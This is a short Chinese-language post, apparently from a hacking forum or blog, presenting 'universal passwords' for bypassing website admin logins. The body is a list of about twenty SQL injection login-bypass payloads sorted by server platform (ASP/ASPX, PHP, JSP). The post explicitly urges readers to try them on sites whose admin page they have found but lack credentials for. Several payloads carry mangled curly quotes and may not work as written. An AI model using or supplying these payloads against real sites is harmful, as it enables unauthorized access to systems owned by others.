所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。当你找到网站的后台地址,却没有办法搞到帐号密码登陆的时候,除了尝试社工你还可以尝试一下这些万能密码!
(asp、aspx的万能密码)
1:”or “a”=”a
2:‘)or(‘a’='a
3:'or'='or'
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a'=’a
8:”or”=”a’='a
9:’or”=’
10:admin’or’1=1
11:admin’or'1'='1
12:1 or ’1′=’1′ or 1=1
13:‘OR 1=1%00
14:“or 1=1%00
15:‘xor
'or'='or'
(PHP的万能密码)
or 1=1/* admin' or 1=1 or 'honker'<>'hacker
User:something
Pass:OR 1=1
(jsp的万能密码)
1or1=1
admin OR 1=1/*